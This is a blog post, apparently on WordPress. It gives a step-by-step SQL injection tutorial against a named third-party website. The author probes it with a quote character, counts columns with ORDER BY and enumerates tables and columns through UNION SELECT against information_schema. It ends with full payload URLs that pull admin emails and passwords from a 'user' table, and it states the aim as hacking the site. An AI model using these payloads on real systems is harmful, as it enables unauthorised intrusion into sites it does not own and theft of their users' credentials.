SQL INJECTION

I have vulnerable website

http://www.morephotosradio.com/transcript.php?interview_id=2021

To Check This website is vulnerable or not put ‘ sign in the end of link Like

==>http://www.morephotosradio.com/transcript.php?interview_id=2021’

The Page Will Show sqli error Like This

==> Find Number of tables by using order by –+ Query Like This

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45–+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47–+  Error

==> This Error shows that the website have 46 number of tables

==> Now Remove order by and go to UNION Based In Hackbar And Click On union+all+select -statement

==>A Small Box Will OPen In that box type the number of tables like of this website is 46

==> Also Place – Sign before parameter id like this (id=-2021)

==>Press Execuate Some Numbers will be shown on page Like You Can See In The Image Above Replace any one number by group_concat(table_name) and

write from information_schema.tables where table_schema=database()–+ in the end of url

For Finding Table Information

http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT
1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()–+

==> The Page Will Show All Table Names We Want To Hack website so we need to find admin username and password

==> Now Remove database() From The query and go to sql basics then char() and then mysqlchar a small window will open

==>In That Window Type tables like admin user member i will type user because my admin table name is user

==>Click Ok Now Replace the following things of query

group_concat(table_name) to group_concat(column_name)

table_schema to table_name

information_schema.tables to information_schema.columns

the database() is already removed and mysql char of user is placed in the place of user

==> The Query For Columns Will Become Like This

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)–+

Press Execute

==> Now We Need Admin Email And Passwords

replace column_name with any column name you  need like email amd password and in the end of url write from user like this

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user–+

Press Execute

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s